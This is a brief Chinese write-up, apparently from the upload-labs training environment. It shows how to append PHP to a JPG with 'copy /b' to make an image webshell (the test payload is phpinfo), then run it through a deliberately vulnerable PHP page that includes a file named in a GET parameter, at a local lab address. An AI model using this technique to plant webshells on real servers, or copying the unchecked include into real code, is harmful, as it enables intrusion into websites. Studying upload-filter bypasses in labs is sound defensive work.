图片一句话制作方法
copy 1.png /b + shell.php /a webshell.jpg
test13.php:
<?php
phpinfo();
?>
test1.jpg
C:\Users\Rnanprince\Desktop\学习文档>copy test1.jpg/b + test13.php/a webshell.jpg
test1.jpg
已复制 1 个文件。
生成文件 :
打开文件末尾有:
上传:
打开
抓包看,能够解析出来其中的webshell代码
但是没有触发包含的脚本
应该是无法解析图片的原因
所以根据题目一开始的提示,要使用文件包含漏洞
在www/upload-labs/upload目录下建立一个php文件:
代码如下:
<?php
/*
本页面存在文件包含漏洞,用于测试图片马是否能正常运行!
*/
header("Content-Type:text/html;charset=utf-8");
$file = $_GET['file'];
if(isset($file)){
include $file;
}else{
show_source(__file__);
}
然后我上传的文件被重命名为7020210712000327.jpg,所以跳转到如下url
http://192.168.77.128:8083/upload-labs/upload/include.php?file=7020210712000327.jpg
就可以解析出如下页面(和抓包里面看到的一样)